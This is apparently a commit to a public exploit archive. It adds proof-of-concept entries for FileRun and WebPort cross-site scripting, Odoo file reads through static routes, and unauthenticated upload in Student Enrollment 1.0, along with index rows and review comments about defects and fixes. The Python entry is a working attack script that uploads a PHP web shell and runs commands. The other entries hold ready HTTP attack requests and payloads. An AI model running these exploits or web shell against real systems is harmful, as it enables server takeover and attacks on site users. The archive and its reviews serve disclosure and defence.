DB: 2020-06-23

6 changes to exploits/shellcodes

Frigate 2.02 - Denial Of Service (PoC)
FileRun 2019.05.21 - Reflected Cross-Site Scripting
Student Enrollment 1.0 - Unauthenticated Remote Code Execution
Odoo 12.0 - Local File Inclusion
Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload
WebPort 1.19.1 - Reflected Cross-Site Scripting
WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
parent 7480caf5bd
commit 09b5d3c1b6
7 changed files with 254 additions and 0 deletions
62
exploits/multiple/webapps/48607.txt
Normal file
@ -0,0 +1,62 @@
# Exploit Title: FileRun 2019.05.21 - Reflected Cross-Site Scripting
# Date: 2019-07-01
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://www.filerun.com/
# Software Link: https://filerun.com/download
# Version: v2019.05.21
# Tested on: Windows/Linux
# CVE: CVE-2019-12905

# CVE-2019-12905
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12905
# https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3

# PoC

To exploit vulnerability, someone could upload an allowed file named “><img
src=x onerror=prompt(document.domain)> to impact users who open the page.

POST /filerun/?module=fileman§ion=do&page=up HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.191.129/filerun/
Content-Type: multipart/form-data;
boundary=---------------------------142096305821079611661465592403
Content-Length: 6034
DNT: 1
Connection: close
Cookie: FileRunSID=aqlneuv86ccj3pi4h476faopi5

-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="flowTotalSize"

5100
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="flowIsFirstChunk"

1
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="flowIsLastChunk"

1
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="flowFilename"

â<EFBFBD><EFBFBD>><img src=x onerror=prompt(document.domain)>.jpg
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="path"

/ROOT/HOME
-----------------------------142096305821079611661465592403
Content-Disposition: form-data; name="file"; filename="â<><C3A2>><img src=x
onerror=prompt(document.domain)>.jpg"
Content-Type: image/jpg

<%@ I said you should learn! %>


-----------------------------142096305821079611661465592403--
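Review bot: the payload filename in the `flowFilename` and `file` parts is stored as mangled bytes (`â<EFBFBD><EFBFBD>>...`) where the prose says the file is named `"><img src=x onerror=prompt(document.domain)>`, so the stored request cannot be reproduced from the record; re-save the file as UTF-8 or spell the filename with URL escapes. The header also keeps lab-specific values that the rest of the entry parameterises as `[TARGET]`: `Referer: http://172.16.191.129/filerun/`, a live-looking `FileRunSID` cookie, and a `Content-Length: 6034` that no longer matches the body shown. `# CVE: CVE-2019-12905` and `# CVE-2019-12905` say the same thing twice; keep one. What the PoC shows is the uploaded filename being rendered into the file listing without HTML encoding, so the application-side fix is output encoding of filenames, and an upload whose `flowFilename` contains `<` or `"` is a simple signature for upload-log monitoring.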
57
exploits/multiple/webapps/48609.txt
Normal file
@ -0,0 +1,57 @@
# Exploit Title: Odoo 12.0 - Local File Inclusion
# Date: 2019-06-14
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://www.odoo.com/
# Software Link: https://www.odoo.com/tr_TR/page/download
# Version: v12.0
# Tested on: Windows/Linux
# https://github.com/EmreOvunc/Odoo-12.0-LFI-Vulnerabilities
# https://www.odoo.com/security-report

# PoC-1
To exploit vulnerability, someone could use
'http://[HOST]:8069/base_import/static/c:/windows/win.ini'
request to get some information from the target.

GET /base_import/static/c:/windows/win.ini HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

# PoC-2
To exploit vulnerability, someone could use 'http://[HOST]:8069/
web/static/c:/windows/win.ini' request to get some information from the
target.

GET /web/static/c:/windows/win.ini HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

# PoC-3
To exploit vulnerability, someone could use 'http://[HOST]:8069/
base/static/c:/windows/win.ini' request to get some information from the
target.

GET /base/static/c:/windows/win.ini HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
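Review bot: `# Tested on: Windows/Linux` is not borne out by the PoCs: all three requests read `c:/windows/win.ini`, a Windows-only path, and no Linux equivalent is shown, so either drop Linux from the header or add a request that works on a Linux target. The three PoCs differ only in the static route (`/base_import/static/`, `/web/static/`, `/base/static/`); one request plus a one-line list of the affected routes would say the same with a third of the text. The title says Local File Inclusion, but what the requests demonstrate is an arbitrary file being read back through the static-file handler, which is path traversal / arbitrary file read rather than inclusion; the description should say so, since the CSV is searched by that column. Unlike the sibling FileRun entry there is no CVE line, only the vendor's security-report page; if none was assigned, write `# CVE: N/A` as 48610 does. The server-side fix is to canonicalise the requested path and refuse anything that resolves outside the addon's static directory.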
30
exploits/multiple/webapps/48611.txt
Normal file
@ -0,0 +1,30 @@
# Exploit Title: WebPort 1.19.1 - Reflected Cross-Site Scripting
# Date: 2019-05-30
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/
# Version: v1.19.1
# Tested on: Windows/Linux
# CVE-2019-12461
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12461
# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS

# PoC

To exploit vulnerability, someone could use 'http://
[server]:8090/log?type="</script><script>alert('xss');</script><script>'
request
to impact users who open a maliciously crafted link or third-party web page.

GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E
HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
Upgrade-Insecure-Requests: 1
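Review bot: the request line is wrapped, with `GET /log?type=...` on one line and `HTTP/1.1` on the next, so the request is not valid HTTP if replayed as stored; join the two lines. The `Cookie: __tiny_sessid=6361847c-...` value is a session id from the author's own instance and plays no part in a reflected XSS; redact it as `[SESSION]` (the same value is repeated in 48612). The payload begins with `"</script>`, which tells the reader that the `type` parameter is reflected inside an inline script block rather than into HTML; that is worth one sentence in the PoC text, because the fix (not reflecting the parameter into script at all, or at minimum JavaScript-string escaping it) differs from the HTML output encoding that applies to the FileRun entry. For detection, a `type=` parameter containing `%3C/script%3E` covers both this and the 48612 variant.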
44
exploits/php/webapps/48608.py
Executable file
@ -0,0 +1,44 @@
# Exploit Title: Student Enrollment 1.0 - Unauthenticated Remote Code Execution
# Date: 2020-06-22
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://www.sourcecodester.com/php/14281/online-student-enrollment-system-using-phpmysqli.html
# Version: 1.0
# Tested on: Windows 10 / WampServer
# Usage : python3 exploit.py -u TARGET_URL -c CODE_TO_EXECUTE

import requests
import string
import random
import sys
import getopt

options, remainder = getopt.gnu_getopt(sys.argv[1:], 'hu:c:')

for opt, arg in options:
if opt in ('-h'):
print('Usage: python3 exploit.py -u TARGET_URL -c CODE_TO_EXECUTE')
exit()
elif opt in ('-u'):
url = arg
elif opt in ('-c'):
cmd = arg



res = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 10))

session = requests.session()

burp0_url = url+"/admin/register.php"
burp0_cookies = {}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.100/student_enrollment/admin/register.php", "Content-Type": "multipart/form-data; boundary=---------------------------5220369311929647034402434351", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
burp0_data = "-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n"+res+"\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"email\"\r\n\r\n"+res+"@gmail.com\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+res+"\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n12345678\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"c_password\"\r\n\r\n12345678\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"photo\"; filename=\"a.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n$cmd = shell_exec($_GET['cmd']); echo $cmd;\n?>\n\r\n-----------------------------5220369311929647034402434351\r\nContent-Disposition: form-data; name=\"register\"\r\n\r\n\r\n-----------------------------5220369311929647034402434351--\r\n"
session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

rce = requests.get("http://192.168.1.100/student_enrollment/admin/images/"+res+".php?cmd="+cmd)

get_code = rce.text

print("Exploit Author--> Selim Enes 'Enesdex' Karaduman")

print(get_code)
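Review bot: the second request hardcodes the author's lab host, `requests.get("http://192.168.1.100/student_enrollment/admin/images/"+res+".php?cmd="+cmd)`, so `-u TARGET_URL` governs only the upload and the script as written cannot complete against any other host; the same lab address is baked into the `Referer` header. `url` and `cmd` are assigned only inside the option loop, so running without `-u` or `-c` ends in a `NameError` at `burp0_url = url+...` rather than the usage message, and `opt in ('-h')` is a substring test against the string `'-h'`, not a tuple membership test (same for `-u` and `-c`). The upload names the part `filename="a.php"` while the retrieval fetches `res+".php"`, which silently assumes the application renames the stored photo to the registered username; that assumption carries the whole PoC and belongs in a comment. The `session` object is created for the POST and then bypassed with a bare `requests.get`. From the defender's side the root cause is visible in the POST body: `admin/register.php` accepts a `photo` part declared as `Content-Type: application/x-php` from an unauthenticated client and stores it under `admin/images/`, so the fix is to authenticate registration, allow only image extensions and MIME types, and serve the upload directory without PHP execution; a `.php` filename in a multipart POST to `register.php` is also an easy log or WAF signature.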
24
exploits/php/webapps/48610.txt
Normal file
@ -0,0 +1,24 @@
# Exploit Title: Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload
# Google Dork: N/A
# Date: 2020-06-20
# Exploit Author: BKpatron
# Vendor Homepage: https://www.campcodes.com/projects/php/4745/online-student-enrollment-system-in-php-mysqli/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/student_enrollment_1.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A

# Vulnerability:
Online Student Enrollment System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.

#CSRF PoC:

<html>
<body>
<form action="http://localhost/student_enrollment/admin/index.php?page=user-profile" method="POST" enctype="multipart/form-data">
<input type="file" name="userphoto" required="" id="photo"><br>
<input class="btn btn-info" type="submit" name="upphoto" value="Upload Photo">
</form>
</body>
</html>
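Review bot: the PoC is headed `#CSRF PoC:` while the title and description claim an unauthenticated upload, and those are different findings. If `admin/index.php?page=user-profile` accepts `userphoto` with no session, the HTML form is only a convenience and the CSRF label is misleading; if it does require an admin session, this is a CSRF-to-upload chain and the title should not say unauthenticated. The text should say which, since the CSV row is classified from the title. The form also shows neither what is uploaded nor where the file is stored, while the description promises RCE through a PHP file; the response or the stored path would make the entry verifiable. This is the same application as 48608 in this commit (`student_enrollment` from sourcecodester) reached through a second upload endpoint, so cross-referencing the two entries would help, and the same mitigation applies: authenticate the endpoint, restrict `userphoto` to image types, and serve the upload directory without PHP execution.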
30
exploits/php/webapps/48612.txt
Normal file
@ -0,0 +1,30 @@
# Exploit Title: WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
# Date: 2019-05-30
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/
# Version: v1.19.1
# Tested on: Windows/Linux

# CVE-2019-12460
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12460
# https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS

# PoC
To exploit vulnerability, someone could use 'http://
[server]:8090/access/setup?type="</script><script>alert('xss');</script><script>'
request
to impact users who open a maliciously crafted link or third-party web page.

GET /access/setup?type=%22%3C/script%3E%3Cscript%3Ealert(%27xss%27);%3C/script%3E%3Cscript%3E
HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0)
Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __tiny_sessid=6361847c-952b-45ba-874c-71f1794ffe37
Upgrade-Insecure-Requests: 1
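Review bot: this entry repeats 48611 line for line apart from the path (`/access/setup` instead of `/log`) and the CVE (CVE-2019-12460 instead of CVE-2019-12461), so the same two defects need fixing here: the request line is wrapped with `HTTP/1.1` on its own line, and the author's `__tiny_sessid=6361847c-...` session cookie is included although a reflected XSS does not need it. Consider folding the two into one entry that lists both reflection points of the `type` parameter with their respective CVEs, or at least cross-reference them in the header; the mitigation (stop reflecting `type` into inline script) is the same for both.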
@ -6750,6 +6750,7 @@ id,file,description,date,author,type,platform,port
44481,exploits/windows/dos/44481.py,"Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC)",2018-04-01,"Mr Bruce",dos,windows,
38079,exploits/windows/dos/38079.py,"Savant Web Server 3.1 - Denial of-Service (PoC)",2012-01-22,DDD004,dos,windows,
43197,exploits/windows/dos/43197.py,"ALLPlayer 7.5 - Denial of-Service (PoC)",2017-11-27,"Kiefer Bauer",dos,windows,
48613,"exploits/windows/dos/48613.Frigate 2.","Frigate 2.02 - Denial Of Service (PoC)",2020-06-22,"Paras Bhatia",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
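Review bot: the new row for 48613 carries a broken file path, `"exploits/windows/dos/48613.Frigate 2."`, with a space and a truncated name where the neighbouring rows use `<id>.py`, and no `exploits/windows/dos/48613.*` file is among the seven files this commit changes (six exploit files plus this CSV), so the index now points at a file that was not added. The description's casing, `Denial Of Service (PoC)`, also differs from the `Denial of-Service (PoC)` form on the adjacent rows; this column is what the archive is searched by, so one form should be used.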
@ -42864,3 +42865,9 @@ id,file,description,date,author,type,platform,port
48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php,
48595,exploits/multiple/webapps/48595.txt,"OpenCTI 3.3.1 - Directory Traversal",2020-06-17,"Raif Berkay Dincel",webapps,multiple,
48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,
48607,exploits/multiple/webapps/48607.txt,"FileRun 2019.05.21 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
48608,exploits/php/webapps/48608.py,"Student Enrollment 1.0 - Unauthenticated Remote Code Execution",2020-06-22,Enesdex,webapps,php,
48609,exploits/multiple/webapps/48609.txt,"Odoo 12.0 - Local File Inclusion",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
48610,exploits/php/webapps/48610.txt,"Online Student Enrollment System 1.0 - Unauthenticated Arbitrary File Upload",2020-06-22,BKpatron,webapps,php,
48611,exploits/multiple/webapps/48611.txt,"WebPort 1.19.1 - Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,multiple,
48612,exploits/php/webapps/48612.txt,"WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting",2020-06-22,"Emre ÖVÜNÇ",webapps,php,
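Review bot: 48612 is filed under `exploits/php/webapps/48612.txt` with platform `php`, while 48611, the same WebPort 1.19.1 product from the same author and date, sits under `exploits/multiple/webapps/` with platform `multiple`; nothing in either header says WebPort is PHP, so the two rows should agree. The author column is inconsistent as well: 48608 is credited as `Enesdex` here although its file header reads `Selim Enes 'Enesdex' Karaduman`, whereas the other new rows carry the full name from their headers. The date column holds the submission date (2020-06-22) for all six rows while the file headers of 48607, 48609, 48611 and 48612 carry 2019 dates; if that is the archive's convention it is fine, but readers reconciling these entries with the CVE timeline will notice the gap.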